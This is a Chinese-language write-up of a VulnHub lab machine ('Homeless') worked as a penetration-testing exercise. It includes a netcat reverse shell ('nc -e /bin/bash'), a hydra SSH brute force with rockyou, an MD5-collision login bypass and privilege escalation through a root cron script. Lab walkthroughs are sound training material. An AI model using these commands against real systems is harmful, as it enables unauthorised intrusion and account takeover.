渗透测试之靶机试炼（十）

靶机简介

靶机地址：
https://download.vulnhub.com/homeless/

运行环境：
VirtualBox

攻击测试机环境
kali
win 10
工具简介

nmap
dirb
python
nc
burp
curl
fastcoll
tail

靶机网卡设置

三台虚拟主机在同一局域网即可
作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。

首先使用nmap进行主机IP发现
命令：nmap 10.211.55.0/24
从结果中得知靶机开启了80端口与22端口，应该是常规web渗透于ssh登录
访问80端口
页面没发现什么可用信息，查看源码
发现这里有点奇怪，把我的User-Agent打印出来了
然而并没有突破性发现 常规思路 扫目录
命令：dirb http://10.211.55.49/
法案robots.txt文件，访问
给了一些提示 rockyou是kali自带的字典 但是并不知道需要干什么，在这里陷入了沉思。。。。。
想到之前找到的那个打印User-Agent，是不是有其他用途，抓包更改
不论你输入什么，他都会直接打印返回，猜想是否需要输入正确的字符串才会给提示。好吧，继续信息收集吧
到最后也没找到，去网上找教程了
发现说是主页的源码里的图片有问题
http://10.211.55.49/images/favicon.jpg
说是最顶端有一排字，这谁看的清啊
不管怎么说，继续搞吧
教程说 将User-Agent内容替换为cyberdog就会给提示
继续吧
果然给了一个目录 访问
是个上传页面
想直接上传个木马 呵呵想的太简单了 一句话都显示文件大 做了大小限制，经过测试只能上传8个字符
百度一下最短webshell，找到一种方法可以执行命令

传上去看看

这里直接给了目录，我们访问
给了一个txt文件 访问
又给了一个id目录 访问
看到上面有一个提示 点击
下载了主页备份文件，登录窗口三个输入框，要求输入的之不一样 但是MD5一样
这里又看了教程 没百度到
使用三个exe文件
fastcoll下载链接：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

tail.exe下载链接：https://www.trisunsoft.com/tail-for-windows.htm

curl.exe下载链接：https://curl.haxx.se/windows/

利用这三个exe程序生成三个名称不同但是MD5相同的 按照大牛的教程 如下

D:\fastcoll>fastcoll_v1.0.0.5.exe -o jlzj0 jlzj1      
#-o参数代表随机生成两个相同MD5的文件
D:\fastcoll>fastcoll_v1.0.0.5.exe -p jlzj1 -o jlzj00 jlzj01  
#-p参数代表根据jlzj1文件随机生成两个相同MD5的文件，注意：生成的MD5与jlzj1不同
D:\fastcoll>tail.exe -c 128 jlzj00 > a                
#-c 128代表将jlzj00的最后128位写入文件a，这128位正是jlzj1与jlzj00的MD5不同的原因
D:\fastcoll>tail.exe -c 128 jlzj01 > b                
#同理
D:\fastcoll>type jlzj0 a > jlzj10                    
#这里表示将jlzj0和a文件的内容合并写入jlzj10
D:\fastcoll>type jlzj0 b > jlzj11                    
#同理写入jlzj11

最终执行
curl.exe --data-urlencode username@D:\fastcoll\jlzj00 --data-urlencode password@D:\fastcoll\jlzj01 --data-urlencode code@D:\fastcoll\jlzj10 --data-urlencode “remember=1&login=Login” http://10.211.55.8/d5fa314e8577e3a7b8534a014b4dcb221de823ad/index.php -i
获取cookie
利用获取的cookie进入系统admin.php页面
给了一个命令执行的页面，可以直接拿到shell
本地监听
nc -lvp 1234

命令执行
nc -e /bin/bash 10.211.55.8 1234
获取了shell
利用python 获取交互式shell
python -c ‘import pty;pty.spawn("/bin/bash")’
在home目录下发现一个用户，进去发现有些文件没有去权限看
这里使用hydra进行密码爆破
hydra -l downfall -P rockyou.txt 10.211.55.49 ssh
之前提示的密码文件使用rockyou.txt 为kali自带的密码文件位置：/usr/share/wordlist/rockyou.txt
得到密码后我们ssh连接
通过查看用户目录下文件得知在/lib/logs/目录下存在一个py脚本文件

切换到/lib/logs目录下，会提示一条消息，你有一封新邮件/var/mail/downfall
我们去查看
发现系统每分钟会以root权限执行命令cd /lib/logs/ && ./homeless.py
我们修改py脚本即可获取root权限
修改homeless.py内容如下
保存 本地监听8899端口

获取root权限。